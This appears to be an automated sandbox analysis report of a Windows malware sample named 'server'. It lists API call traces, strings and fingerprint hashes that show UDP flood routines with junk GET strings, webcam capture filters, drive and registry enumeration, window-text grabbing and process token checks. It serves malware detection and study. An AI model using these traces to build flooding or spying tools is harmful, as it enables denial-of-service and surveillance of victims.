                                                                                              • Instruction Fuzzy Hash: E341C571C047A59FF7A1CF188C447AABBE9FB067E0F10016AD9E193244D3741A4ADBA1
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1000D054
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000), ref: 1000D07C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000D085
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileResource$??2@??3@$CloseCreateDirectoryFindHandleLoadLockReadSizeSystem
                                                                                              • String ID: .key$XXXXXX
                                                                                              • API String ID: 710762369-2601115946
                                                                                              • Opcode ID: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
                                                                                              • Instruction ID: 0c7bdf6f6cfedffafb096b417f82647280419507c62535d74d6fa5ee32727597
                                                                                              • Opcode Fuzzy Hash: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
                                                                                              • Instruction Fuzzy Hash: A83137726006082FE318DA749C55A6B7A8BFBC5370F140B2DFA67C72D1EDE59D0D82A1
                                                                                              APIs
                                                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 10008381
                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 100083D7
                                                                                              • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 100083F5
                                                                                              • lstrlen.KERNEL32(?), ref: 10008409
                                                                                              • lstrlen.KERNEL32(?), ref: 10008417
                                                                                              • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008436
                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 1000847D
                                                                                              • lstrlen.KERNEL32(?), ref: 100084E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Drive$DiskFileFreeInfoInformationLogicalSpaceStringsTypeVolume
                                                                                              • String ID: g
                                                                                              • API String ID: 2496086942-30677878
                                                                                              • Opcode ID: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                                                                                              • Instruction ID: 7a94a0694180289e9c46b8d804f7d8816f5e215d3c8a1403c1990a7dea9b0a38
                                                                                              • Opcode Fuzzy Hash: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                                                                                              • Instruction Fuzzy Hash: 4E41C4705083869FD715CF14C880A9BB7EAFBC8744F04492DF9C987251D7B4AA09CBA2
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 10004DD1
                                                                                              • WSASocketA.WS2_32 ref: 10004DEB
                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 10004E0E
                                                                                              • inet_addr.WS2_32(1007DD2C), ref: 10004E3D
                                                                                              • GetProcessHeap.KERNEL32(00000008,00001000), ref: 10004E4E
                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 10004E55
                                                                                                • Part of subcall function 10004D70: GetCurrentProcessId.KERNEL32 ref: 10004D7F
                                                                                              • GetTickCount.KERNEL32 ref: 10004E93
                                                                                              • sendto.WS2_32(00000000,00000000,00001000,00000000,?,00000010), ref: 10004EBA
                                                                                              • Sleep.KERNEL32(00000064,?,?,00000001), ref: 10004ECF
                                                                                              • RtlExitUserThread.NTDLL(00000000,00000001), ref: 10004EE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HeapProcess$AllocateCountCurrentExitSleepSocketStartupThreadTickUserinet_addrsendtosetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 4173591058-0
                                                                                              • Opcode ID: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
                                                                                              • Instruction ID: c5a2debfd89a1f44daedc798f5d2e11e4375d7b03d2956684dd0a07df8b0980b
                                                                                              • Opcode Fuzzy Hash: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
                                                                                              • Instruction Fuzzy Hash: 263138706403506BF310DF20CC4ABA677E9FF85B80F008529F695AA1D0EBF498098B26
                                                                                              APIs
                                                                                                • Part of subcall function 10069530: CoCreateInstance.OLE32(10077228,00000000,00000001,10077168,?,?,?,?,?,10068F83,?,?), ref: 1006954E
                                                                                                • Part of subcall function 10069530: CoCreateInstance.OLE32(10077238,00000000,00000003,10077158,?,?,?,?,?,10068F83,?,?), ref: 10069562
                                                                                              • CoCreateInstance.OLE32(10077198,00000000,00000001,100771A8,?,?,Capture Filter,?,?,?,?), ref: 10068FCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: *,$Capture Filter$Grabber$iavs$vids
                                                                                              • API String ID: 542301482-3686165303
                                                                                              • Opcode ID: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
                                                                                              • Instruction ID: 6b34a01a8f94a52d972c2f63ee6a2cae5e4b6e391ed04b1ad51ace7a22d3cd02
                                                                                              • Opcode Fuzzy Hash: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
                                                                                              • Instruction Fuzzy Hash: 45C126B46047019FD714CF28C894A5AB7EAFF88350F108A5DF99ACB7A1D730E946CB61
                                                                                              APIs
                                                                                                • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                                                                                • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                                                                                • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                                                                                • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 100127E5
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 100127FF
                                                                                              • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 10012825
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?), ref: 10012832
                                                                                              • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10012854
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000100), ref: 10012876
                                                                                              • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 100128A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@Token$InformationOpenProcess$AccountCreateFirstLookupProcess32SnapshotToolhelp32_strcmpi
                                                                                              • String ID: explorer.exe
                                                                                              • API String ID: 2062827286-3187896405
                                                                                              • Opcode ID: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
                                                                                              • Instruction ID: 3c6e58a02f97abc338737f091e25ee4c367b19baec1748f45827f9b92fdf04fa
                                                                                              • Opcode Fuzzy Hash: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
                                                                                              • Instruction Fuzzy Hash: 17411AB1D01228AFDB10DF95DC85BEEBBB9FB48710F10415AF609A7280D7716A84CFA1
                                                                                              APIs
                                                                                              • wsprintfA.USER32 ref: 1000A85D
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000A882
                                                                                              • wsprintfA.USER32 ref: 1000A8F7
                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000A913
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000A937
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 1000A93E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$Filewsprintf$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWrite
                                                                                              • String ID: Ball\$XXXXXX
                                                                                              • API String ID: 1973673485-3982136319
                                                                                              • Opcode ID: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
                                                                                              • Instruction ID: 495c6c63232d9b85305b454becab353a6f073e9b30b67b104db98610628649c6
                                                                                              • Opcode Fuzzy Hash: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
                                                                                              • Instruction Fuzzy Hash: 5331F63220070427E728CA74CC55BBB7396EBC4721F544B2DF662972C0DEF4AE088695
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E9E
                                                                                              • GetStdHandle.KERNEL32(000000F4,00406360,00000000,?,00000000,00000000), ref: 00403F74
                                                                                              • WriteFile.KERNEL32(00000000), ref: 00403F7B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                              • String ID: B$...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                              • API String ID: 3784150691-92088503
                                                                                              • Opcode ID: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
                                                                                              • Instruction ID: e2e7e3b0d966deab652d805934d5b43aed53a7e34c61163c82d84b1dec86f9c2
                                                                                              • Opcode Fuzzy Hash: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
                                                                                              • Instruction Fuzzy Hash: 6731E372A002186EDF20EB62DD46F9A77BCAB85704F50047BFA45F60C0DA78EA418A5D
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 10004BD4
                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 10004BF1
                                                                                              • htons.WS2_32 ref: 10004C1A
                                                                                              • inet_addr.WS2_32(1007DD2C), ref: 10004C2A
                                                                                              • sendto.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000,?,00000010), ref: 10004C59
                                                                                              • Sleep.KERNEL32(00000028,?,00000000,?,00000010,00000002), ref: 10004C62
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 10004C6F
                                                                                              Strings
                                                                                              • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10004BDA, 10004C53
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitSleepStartupThreadUserhtonsinet_addrsendtosocket
                                                                                              • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                                                                              • API String ID: 3602400006-4039768343
                                                                                              • Opcode ID: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
                                                                                              • Instruction ID: 55386a69bf2c1f1f0394aeb8968783278eab3e70afa46589061ef1ece014295f
                                                                                              • Opcode Fuzzy Hash: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
                                                                                              • Instruction Fuzzy Hash: 7C1122701053A16BF300DF30CC89B6A3BA4FF89754F00061EF191972E1EBB49C08872A
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F55,?,Microsoft Visual C++ Runtime Library,00012010,?,00406360,?,004063B0,?,?,?,Runtime Error!Program: ), ref: 00404CBD
                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404CD5
                                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404CE6
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404CF3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                              • API String ID: 2238633743-4044615076
                                                                                              • Opcode ID: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
                                                                                              • Instruction ID: 7a0cc08ec05e3b4d564e92fce98ceeba057a3e0b493a9dfb57db353efca9b8d4
                                                                                              • Opcode Fuzzy Hash: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
                                                                                              • Instruction Fuzzy Hash: E80175B1700211EBD7219FB59C84A2B3AF8ABC4751391043BA602E22A1D6789C66DB6D
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E1FA
                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000E22C
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 1000E28B
                                                                                              • malloc.MSVCRT ref: 1000E2CC
                                                                                              • malloc.MSVCRT ref: 1000E2D7
                                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?), ref: 1000E35E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: malloc$AllocEnumInfoLocalOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 574313380-0
                                                                                              • Opcode ID: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                                                                                              • Instruction ID: 2dbc490ccdae4f0339eaf1a45c7cb0cbb32c1b4649a87cd96ed82d0427daa14a
                                                                                              • Opcode Fuzzy Hash: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                                                                                              • Instruction Fuzzy Hash: E561BE716083559FD318CF28C884A2BBBE9EBC8790F44492CF68AD3350D671EE05CB92
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BD8
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BEE
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C08
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C2A
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C3A
                                                                                              • CloseWindow.USER32(?), ref: 10068C49
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C53
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C77
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@$Close$HandleWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3237098652-0
                                                                                              • Opcode ID: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
                                                                                              • Instruction ID: 47ea1eda927b8dc083e930fae728241aa0dc08fd9b84fd6a3200258ce030e435
                                                                                              • Opcode Fuzzy Hash: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
                                                                                              • Instruction Fuzzy Hash: F2416BF5600B409FC724CF69C980816B7FAFF89710B458A2DE1468BB11DB35F948CB91
                                                                                              APIs
                                                                                              • GetWindowTextA.USER32(?,?,00000400), ref: 1001206F
                                                                                              • IsWindowVisible.USER32(?), ref: 10012076
                                                                                              • lstrlen.KERNEL32(?), ref: 1001208F
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 1001209D
                                                                                              • lstrlen.KERNEL32(?), ref: 100120AA
                                                                                              • Sleep.KERNEL32(00000001), ref: 100120B3
                                                                                              • LocalSize.KERNEL32 ref: 100120BA
                                                                                              • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100120C9
                                                                                              • lstrlen.KERNEL32(?,?,?,00000042), ref: 100120E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
